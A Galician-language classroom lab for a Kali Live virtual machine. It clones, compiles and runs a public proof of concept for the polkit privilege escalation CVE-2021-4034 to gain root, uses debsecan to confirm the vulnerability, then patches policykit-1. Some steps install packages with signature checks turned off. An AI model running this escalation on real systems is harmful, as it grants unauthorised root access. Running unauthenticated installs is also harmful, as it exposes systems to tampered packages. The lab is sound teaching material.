CVE+debsecan

ESCENARIO

Máquina virtual ou física:

RAM \geq 4096MB CPU \geq 2 PAE/NX habilitado ISO/CD/DVD/USB: kali-linux-2021.4a-live-amd64.iso

REDE: DHCP (NAT)

BIOS: Permite arranque dispositivo extraíble: CD/DVD, USB



LIMITACIÓN DE RESPONSABILIDADE O autor do presente documento declina calquera responsabilidade asociada ao uso incorrecto e/ou malicioso que puidese realizarse coa información exposta no mesmo. Por tanto, non se fai responsable en ningún caso, nin pode ser considerado legalmente responsable en ningún caso, das consecuencias que poidan derivarse da información contida nel ou que esté enlazada dende ou hacia el, incluíndo os posibles erros e información incorrecta existentes, información difamatoria, así como das consecuencias que se poidan derivar sobre a súa aplicación en sistemas de información reais e/ou virtuais. Este documento foi xerado para uso didáctico e debe ser empregado en contornas privadas e virtuais controladas co permiso correspondente do administrador desas contornas.

NOTAS:

- [1] Concepto CVF
- [2] CVE Id
- [3] Debian e CVE
- [4] CVE Program Mission
- [5] INCIBE CVE-2021-4034
- [6] Exploit CVE-2021-4034
- [7] kali-linux-2021.4a-live-amd64.iso

Máquina virtual Kali amd64 (kali-linux-2021.4a-live-amd64.iso [7])

1. exploit (Explotar a vulnerabilidade CVE-2021-4034)

- A. Descargar [7]
- B. Arrancar coa Kali Live amd64 descargada
- C. Na contorna gráfica abrir un terminal e executar:

kali@kali:~\$ setxkbmap es #Cambiar o mapa de teclado ao idioma español.

kali@kali:~\$ git clone https://github.com/berdav/CVE-2021-4034 #Descargar o repositorio CVE-2021-4034 de git de berdav

kali@kali:~\$ cd CVE-2021-4034 #Acceder ao cartafol CVE-2021-4034

kali@kali:~\$ make #Compilar para crear o executable(exploit) cve-2021-4034

kali@kali:~\$./cve-2021-4034 #Executar o exploit cve-2021-4034

#CONSEGUIDO ACCESO ROOT

id #Imprime UIDs e GIDs reais e efectivos do usuario que executa o comando, neste caso os do usuario *root*

exit #Saír da consola root que acabamos de conseguir mediante escalada de privilexios (CVE-2021-4034).

kali@kali:~\$ exit #Pechar o terminal saíndo da consola local do usuario kali.

2. debsecan (Listar vulnerabilidades presentes no sistema operativo)

Na contorna gráfica abrir un terminal e executar:

kali@kali:~\$ setxkbmap es #Cambiar o mapa de teclado ao idioma español.

kali@kali:~\$ sudo su - #Acceder á consola de root(administrador) a través dos permisos configurados co comando sudo (/etc/sudoers, visudo)

root@kali:~# apt update || apt-get update #Actualizar repositorios declarados no ficheiro /etc/apt/souces.list e nos ficheiros existentes no directorio /etc/apt/sources.list.d

Así, unha vez realizada a consulta dos ficheiros existentes nas rutas anteriores, descárganse uns ficheiros coas listas de paquetes posibles a instalar. Estes ficheiros son gardados en /var/lib/apt/lists

O comando non se executa correctamente. Isto é debido a que hoxe en día a distribución 2021.4a está desactualizada, polo cal os repositorios xa non se atopan onde se esperan no arquivo /etc/apt/sources.list, polo cal temos que modificar este arquivo para que apunte aos repositorios "old" de Kali. Así, modificamos o ficheiro para que posúa o seguinte contido:

deb http://old.kali.org/kali 2022.1 main contrib non-free
deb-src http://old.kali.org/kali 2022.1 main contrib non-free

E temos que executar o comando anterior modificado para que poida funcionar a actualización de repositorios non asinados por sen antigos:

apt update --allow-insecure-repositories || apt-qet update --allow-insecure-repositories

root@kali:~# apt search debsecan || apt-cache search debsecan #Buscar nas anteriores listas descargadas en /var/lib/apt/lists paquetes que coincidan co patrón de búsqueda debsecan. A saída do/s comando/s amosan o nome do/s paquete/s e unha pequena descrición do/s mesmo/s.

root@kali:~# apt show debsecan || apt-cache show debsecan #Amosa información sobre o paquete debsecan, incluídas as súas dependencias, instalación e tamaño de descarga, fontes nas que está dispoñible o paquete, descrición do contido dos paquetes e moito máis.

debsecan é unha ferramenta para xerar unha lista de vulnerabilidades que afectan a instalacións concretas de Debian

debsecan execútase no sistema que se vai a analizar, e descarga da internet información sobre vulnerabilidades. Pode enviar correos electrónicos ás partes interesadas cando se descubran novas vulnerabilidades ou cando as actualizacións de seguridade estean disponibles.

root@kali:~# apt -y install debsecan --allow-unauthenticated || apt-get -y install debsecan --allow-unauthenticated #Instalar o paquete de nome *debsecan*. Co parámetro -y automaticamente asumimos yes a calquera pregunta que ocorra na instalación do paquete. A opción --allow-unauthenticated é necesaria para poder instalar a través destes respositorios antigos.

Pode chegar a ser necesario executar o seguinte comando:

apt -y install debsecan --allow-unauthenticated --fix-missing

root@kali:~# debsecan #Execución para auditar e conseguir as vulnerabilidades existentes no noso sistema operativo

root@kali:~# debsecan | grep -i cve-2021-4034 #Filtrar a saída da execución do comando debsecan para revisar se o sistema operativo é vulnerable ao CVE-2021-4034

```
CVE-2021-4034 gir1.2-polkit-1.0
CVE-2021-4034 libpolkit-agent-1-0
CVE-2021-4034 libpolkit-gobject-1-0
CVE-2021-4034 policykit-1
```

root@kali:~# exit #Saír da consola local sudo na que estabamos a traballar para voltar á consola local de kali. kali@kali:~\$ exit #Pechar o terminal saíndo da consola local do usuario kali.

3. Corrixir vulnerabilidades (Actualización de paquetes do sistema operativo)

Na contorna gráfica abrir un terminal e executar:

kali@kali:~\$ setxkbmap es #Cambiar o mapa de teclado ao idioma español.

kali@kali:~\$ sudo su - #Acceder á consola de root(administrador) a través dos permisos configurados co comando sudo (/etc/sudoers, visudo)

root@kali:~# apt policy policykit-1 #Amosa o posible paquete candidato de policykit-1 a instalar e, dado o caso, que versión do paquete policykit-1 está instalado.

```
policykit-1:
    Installed: 0.105-31+kali1
    Candidate: 0.105-31.1+kali1
    Version table:
        0.105-31.1+kali1 500
        500 http://old.kali.org/kali 2022.1/main amd64 Packages
*** 0.105-31+kali1 100
        100 /var/lib/dpkg/status
```

root@kali:~# apt -y install policykit-1 --allow-unauthenticated || apt-get -y install policykit-1 --allow-unauthenticated #Instalar o paquete de nome *policykit-1*. Co parámetro -y automaticamente asumimos yes a calquera pregunta que ocorra na instalación do paquete. A opción --allow-unauthenticated é necesaria para poder instalar a través destes respositorios antigos.

root@kali:~# exit #Saír da consola local sudo na que estabamos a traballar para voltar á consola local de kali.

Comprobar que a vulnerabilidade está corrixida realizando de novo o apartado 1B.

Ricardo Feijoo Costa



This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License